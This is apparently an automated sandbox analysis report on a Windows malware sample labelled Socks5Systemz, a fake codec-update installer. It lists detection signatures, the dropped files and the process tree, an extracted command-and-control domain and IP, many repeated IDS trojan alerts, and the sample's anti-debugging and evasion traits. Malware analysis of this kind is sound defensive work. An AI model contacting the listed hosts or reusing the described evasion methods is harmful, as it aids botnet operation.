
Windows Analysis Report
0RWRPBSuDx.exe

Overview

General Information

Sample name:0RWRPBSuDx.exe
renamed because original name is a hash value
Original sample name:d19197438a7371baaac62fec8dabb3d7.exe
Analysis ID:1417492
MD5:d19197438a7371baaac62fec8dabb3d7
SHA1:3252c13b0af9e6a71c11bf9ed37122b3d76064bd
SHA256:e2de4097b80b8480f28f08bc4fc238dca38dbdcb6bbb0c77a83e3753cb03dcf7
Tags:32exe

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Socks5Systemz
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 0RWRPBSuDx.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\0RWRPBSuDx.exe" MD5: D19197438A7371BAAAC62FEC8DABB3D7)
    • 0RWRPBSuDx.tmp (PID: 6940 cmdline: "C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp" /SL5="$20420,1594531,54272,C:\Users\user\Desktop\0RWRPBSuDx.exe" MD5: D8E53E1B8EA1B12BC3F40BB9F8B14F38)
      • codecpackupdate.exe (PID: 7040 cmdline: "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -i MD5: 0E347C627EFDED3BF78AFA21FF8B54D3)
      • codecpackupdate.exe (PID: 7084 cmdline: "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -s MD5: 0E347C627EFDED3BF78AFA21FF8B54D3)
  • cleanup

Malware Configuration

{"C2 list": ["bvuppwf.com"]}
Yara Overview

Source | Rule | Description | Author | Strings
00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000003.00000002.2867940792.0000000000731000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: codecpackupdate.exe PID: 7084 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

Sigma Overview

No Sigma rule has matched
        Timestamp:03/29/24-12:59:10.764656
        SID:2050112
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:35.421196
        SID:2049467
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:59.675457
        SID:2049467
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:28.814022
        SID:2049467
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:58.279145
        SID:2050112
        Source Port:49740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:52.205310
        SID:2049467
        Source Port:49806
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:48.200098
        SID:2050112
        Source Port:49801
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:44.183959
        SID:2049467
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:29.458062
        SID:2050112
        Source Port:49779
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:54.762452
        SID:2050112
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:25.184508
        SID:2050112
        Source Port:49773
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:17.561359
        SID:2049467
        Source Port:49763
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:32.211512
        SID:2050112
        Source Port:49782
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:10.122007
        SID:2049467
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:21.394081
        SID:2049467
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:03.387980
        SID:2050112
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:37.749118
        SID:2049467
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:24.138039
        SID:2049467
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:47.153192
        SID:2049467
        Source Port:49800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:31.562211
        SID:2049467
        Source Port:49781
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:18.201077
        SID:2050112
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:57.434224
        SID:2049467
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:25.828412
        SID:2050112
        Source Port:49774
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:44.826160
        SID:2050112
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:38.599677
        SID:2050112
        Source Port:49791
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:28.169308
        SID:2049467
        Source Port:49777
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:32.211512
        SID:2049467
        Source Port:49782
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:01.144442
        SID:2050112
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:11.403065
        SID:2050112
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:14.168811
        SID:2049467
        Source Port:49759
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:45.464018
        SID:2050112
        Source Port:49798
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:00.317751
        SID:2050112
        Source Port:49816
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:48.200098
        SID:2049467
        Source Port:49801
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:52.843294
        SID:2049467
        Source Port:49807
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:17.561359
        SID:2050112
        Source Port:49763
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:09.075777
        SID:2049467
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:23.090769
        SID:2049467
        Source Port:49771
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:55.404429
        SID:2050112
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:36.058657
        SID:2049467
        Source Port:49788
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:02.340536
        SID:2050112
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:39.978368
        SID:2050112
        Source Port:49792
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:31.562211
        SID:2050112
        Source Port:49781
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:00.626740
        SID:2049467
        Source Port:49743
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:13.121896
        SID:2049467
        Source Port:49758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:24.138039
        SID:2050112
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:26.471385
        SID:2050112
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:39.978368
        SID:2049467
        Source Port:49792
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:18.201077
        SID:2049467
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:19.483683
        SID:2050112
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:22.033829
        SID:2049467
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:01.268339
        SID:2050112
        Source Port:49744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:34.777689
        SID:2049467
        Source Port:49786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:37.106191
        SID:2049467
        Source Port:49789
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:07.153408
        SID:2050112
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:43.547929
        SID:2049467
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:21.394081
        SID:2050112
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:49.480506
        SID:2050112
        Source Port:49803
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:46.108211
        SID:2050112
        Source Port:49799
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:44.183959
        SID:2050112
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:01.144442
        SID:2049467
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:56.055877
        SID:2050112
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:58.279145
        SID:2049467
        Source Port:49740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:52.205310
        SID:2050112
        Source Port:49806
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:16.918885
        SID:2049467
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:44.826160
        SID:2049467
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:59.965425
        SID:2050112
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:36.058657
        SID:2050112
        Source Port:49788
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:02.340536
        SID:2049467
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:59.031292
        SID:2050112
        Source Port:49814
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:42.903229
        SID:2050112
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:09.075777
        SID:2050112
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:07.805203
        SID:2049467
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:53.482569
        SID:2050112
        Source Port:49808
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:25.184508
        SID:2049467
        Source Port:49773
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:20.124059
        SID:2049467
        Source Port:49767
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:03.080619
        SID:2050112
        Source Port:49820
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:11.403065
        SID:2049467
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:32.856145
        SID:2050112
        Source Port:49783
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:28.169308
        SID:2050112
        Source Port:49777
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:54.762452
        SID:2049467
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:50.109189
        SID:2049467
        Source Port:49804
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:02.442251
        SID:2050112
        Source Port:49819
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:57.434224
        SID:2050112
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:08.435175
        SID:2050112
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:01.795965
        SID:2049467
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:56.055877
        SID:2049467
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:13.121896
        SID:2050112
        Source Port:49758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:33.499589
        SID:2049467
        Source Port:49784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:15.452590
        SID:2050112
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:54.123875
        SID:2049467
        Source Port:49809
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:49.480506
        SID:2049467
        Source Port:49803
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:00.626740
        SID:2050112
        Source Port:49743
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:14.816268
        SID:2049467
        Source Port:49760
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:50.109189
        SID:2050112
        Source Port:49804
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:12.050126
        SID:2049467
        Source Port:49757
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:22.033829
        SID:2050112
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:27.122910
        SID:2050112
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:41.029454
        SID:2049467
        Source Port:49793
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:05.059289
        SID:2049467
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:20.124059
        SID:2050112
        Source Port:49767
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:26.471385
        SID:2049467
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:06.106340
        SID:2050112
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:19.483683
        SID:2049467
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:51.153063
        SID:2050112
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:48.841670
        SID:2049467
        Source Port:49802
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:18.842102
        SID:2049467
        Source Port:49765
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:30.918916
        SID:2050112
        Source Port:49780
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:59.965425
        SID:2049467
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:02.442251
        SID:2049467
        Source Port:49819
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:12.050126
        SID:2050112
        Source Port:49757
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:34.137988
        SID:2050112
        Source Port:49785
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:16.918885
        SID:2050112
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:32.856145
        SID:2049467
        Source Port:49783
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:58.916637
        SID:2049467
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:27.122910
        SID:2049467
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:56.945215
        SID:2049467
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:46.108211
        SID:2049467
        Source Port:49799
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:34.777689
        SID:2050112
        Source Port:49786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:20.762171
        SID:2050112
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:07.805203
        SID:2050112
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:42.903229
        SID:2049467
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:33.499589
        SID:2050112
        Source Port:49784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:35.421196
        SID:2050112
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:03.387980
        SID:2049467
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:01.795965
        SID:2050112
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:08.435175
        SID:2049467
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:41.029454
        SID:2050112
        Source Port:49793
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:28.814022
        SID:2050112
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:15.452590
        SID:2049467
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:47.153192
        SID:2050112
        Source Port:49800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:06.106340
        SID:2049467
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:10.764656
        SID:2049467
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:37.749118
        SID:2050112
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-13:00:03.080619
        SID:2049467
        Source Port:49820
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:58:58.916637
        SID:2050112
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:54.123875
        SID:2050112
        Source Port:49809
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:59.031292
        SID:2049467
        Source Port:49814
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:59:53.482569
        SID:2049467
        Source Port:49808
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp                 SID      Source Port  Destination Port  Protocol  Classtype
        03/29/24-12:59:59.675457  2050112  49815        80                TCP       A Network Trojan was detected
        03/29/24-12:59:45.464018  2049467  49798        80                TCP       A Network Trojan was detected
        03/29/24-12:59:20.762171  2049467  49768        80                TCP       A Network Trojan was detected
        03/29/24-12:59:48.841670  2050112  49802        80                TCP       A Network Trojan was detected
        03/29/24-12:59:23.090769  2050112  49771        80                TCP       A Network Trojan was detected
        03/29/24-12:59:05.059289  2050112  49748        80                TCP       A Network Trojan was detected
        03/29/24-12:59:51.153063  2049467  49805        80                TCP       A Network Trojan was detected
        03/29/24-12:59:38.599677  2049467  49791        80                TCP       A Network Trojan was detected
        03/29/24-12:59:18.842102  2050112  49765        80                TCP       A Network Trojan was detected
        03/29/24-12:59:55.404429  2049467  49811        80                TCP       A Network Trojan was detected
        03/29/24-12:59:25.828412  2049467  49774        80                TCP       A Network Trojan was detected
        03/29/24-13:00:00.317751  2049467  49816        80                TCP       A Network Trojan was detected
        03/29/24-12:59:14.816268  2050112  49760        80                TCP       A Network Trojan was detected
        03/29/24-12:59:43.547929  2050112  49795        80                TCP       A Network Trojan was detected
        03/29/24-12:59:01.268339  2049467  49744        80                TCP       A Network Trojan was detected
        03/29/24-12:59:56.945215  2050112  49813        80                TCP       A Network Trojan was detected
        03/29/24-12:59:30.918916  2049467  49780        80                TCP       A Network Trojan was detected
        03/29/24-12:59:10.122007  2050112  49754        80                TCP       A Network Trojan was detected
        03/29/24-12:59:37.106191  2050112  49789        80                TCP       A Network Trojan was detected
        03/29/24-12:59:07.153408  2049467  49750        80                TCP       A Network Trojan was detected
        03/29/24-12:59:52.843294  2050112  49807        80                TCP       A Network Trojan was detected
        03/29/24-12:59:34.137988  2049467  49785        80                TCP       A Network Trojan was detected
        03/29/24-12:59:14.168811  2050112  49759        80                TCP       A Network Trojan was detected
        03/29/24-12:59:29.458062  2049467  49779        80                TCP       A Network Trojan was detected

        AV Detection

        Source: 0RWRPBSuDx.exe  Avira: detected
        Source: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe  Avira: detection malicious, Label: HEUR/AGEN.1324697
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe  Avira: detection malicious, Label: HEUR/AGEN.1324697
        Source: codecpackupdate.exe.7084.3.memstrmin  Malware Configuration Extractor: Socks5Systemz {"C2 list": ["bvuppwf.com"]}
        Source: http://45.142.214.240/  Virustotal: Detection: 7%
        Source: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe  Virustotal: Detection: 38%
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe  Virustotal: Detection: 38%
        Source: 0RWRPBSuDx.exe  Virustotal: Detection: 9%
        Source: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe  Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe  Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_0045B4AC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_0045B560 ArcFourCrypt
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_0045B578 ArcFourCrypt
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_10001000 ISCryptGetVersion
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_10001130 ArcFourCrypt

        Compliance

        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe  Unpacked PE file: 2.2.codecpackupdate.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe  Unpacked PE file: 3.2.codecpackupdate.exe.400000.0.unpack
        Source: 0RWRPBSuDx.exe  Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_0047A44C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_0047077C FindFirstFileA,FindNextFileA,FindClose
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_004513E4 FindFirstFileA,GetLastError
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_004601DC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_00478334 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
